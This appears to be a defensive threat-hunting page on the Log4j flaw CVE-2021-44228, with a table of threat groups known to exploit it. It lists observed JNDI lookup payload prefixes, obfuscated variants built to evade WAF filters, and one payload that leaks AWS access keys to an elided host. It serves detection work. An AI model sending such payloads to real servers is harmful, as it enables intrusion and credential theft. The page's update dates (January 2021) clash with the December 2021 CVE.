Log4j Threat Hunting and Incident Response Resources

Latest Updates

Included New Log4J Section - 1/13/2021
Added Threat Actors and new link to payloads - 1/20/2021

Log4j Vulnerability CVE-2021-44228

A flaw in Log4j, a Java library for logging error messages in applications, is the most high-profile security vulnerability on the internet right now and comes with a severity score of 10 out of 10. Log4J is a widely used Java library for logging error messages in applications. It is used in enterprise software applications, including those custom applications developed in-house by businesses, and forms part of many cloud computing services. Because Log4j is so widely used, the vulnerability may impact a very wide range of software and services from many major vendors.

Attack Payload Exploiting JNDI Lookup

The attack payload to exploit this vulnerability is as follows: ${jndi:://}

There are several patterns in the protocols leveraging JNDI Lookup. While it normally communicates via LDAP (Lightweight Directory Access Protocol) in many cases, there are a variety of protocols and obfuscation patterns to avoid WAF (Web Application Firewall) detection.

The table below lists the most common attack payloads observed.

${jndi:ldap://
${jndi:dns://
${jndi:${lower:l}${lower:d}${lower:a}${lower:p}://
${jndi:${lower:l}${lower:d}a${lower:p}://
${jndi:ldaps://
${jndi:iiop://
${jndi:rmi://
${jndi:${lower:d}n${lower:s}://

Payload attempts to steal AWS access keys from environment variables
${jndi:ldap://${env:AWS_ACCESS_KEY}.(snipped)}

`Threat Groups`

Grouping	Actor	Mentioned Alias	Other Alias EternalLiberty	Threat Report	Note
State actor	China	HAFNIUM	N/A	MSTIC (2)	HAFNIUM, a threat actor group operating out of China, has been observed utilizing the vulnerability to attack virtualization infrastructure to extend their typical targeting. In these attacks, HAFNIUM-associated systems were observed using a DNS service typically associated with testing activity to fingerprint systems.
State actor	Iran	PHOSPHORUS	APT35, TEMP.Beanie, TA 453, NewsBeef, CharmingKitten, G0003, CobaltIllusion, TG-2889, Timberworm, C-Major, Group 41, Tarh Andishan, Magic Hound, Newscaster	MSTIC (2)	Iranian actor that has been deploying ransomware, acquiring and making modifications of the Log4j exploit.
Organized Cybercrime	Russia	Wizard Spider	Trickbot Gang, FIN12, GOLD BLACKBURN, Grim Spider	AdvIntel	Wizard Spider is the developer of the Conti Ransomware-as-a-Service (RaaS) operation which has a high number of affiliates, and a Conti affiliate has leveraged Log4Shell in Log4j2 in the wild
Organized Cybercrime	Russia	EvilCorp	Indrik Spider, GOLD DRAKE	Cryptolaemus	EvilCorp are the developers of the Dridex Trojan, which began life as a banking malware but has since shifted to support the delivery of ransomware, which has included BitPaymer, DoppelPaymer, Grief, and WastedLocker, among others. Dridex is now being dropped following the exploitation of vulnerable Log4j instances
State actor	China	Aquatic Panda	N/A	CrowdStrike	AQUATIC PANDA is a China-based targeted intrusion adversary with a dual mission of intelligence collection and industrial espionage. It has likely operated since at least May 2020. AQUATIC PANDA operations have primarily focused on entities in the telecommunications, technology and government sectors. AQUATIC PANDA relies heavily on Cobalt Strike, and its toolset includes the unique Cobalt Strike downloader tracked as FishMaster. AQUATIC PANDA has also been observed delivering njRAT payloads to targets.
To be determined	China	DEV-0401	N/A	MSTIC (4)	Attackers started exploiting the CVE-2021-44228 vulnerability in internet-facing systems running VMware Horizon. An investigation shows that successful intrusions in these campaigns led to the deployment of the NightSky ransomware. These attacks are performed by a China-based ransomware operator that MSTIC is tracking as DEV-0401. DEV-0401 has previously deployed multiple ransomware families including LockFile, AtomSilo, and Rook, and has similarly exploited Internet-facing systems running Confluence (CVE-2021-26084) and on-premises Exchange servers (CVE-2021-34473).
Organized Cybercrime	Russia	Mummy Spider	TA542, MealyBug, GoldCrestwood	SentinelOne	Naturally, the Emotet crew has been taking advantage of Log4j as well. For example, vulnerable servers were quickly compromised and used for staging and payload hosting within the greater Emotet network.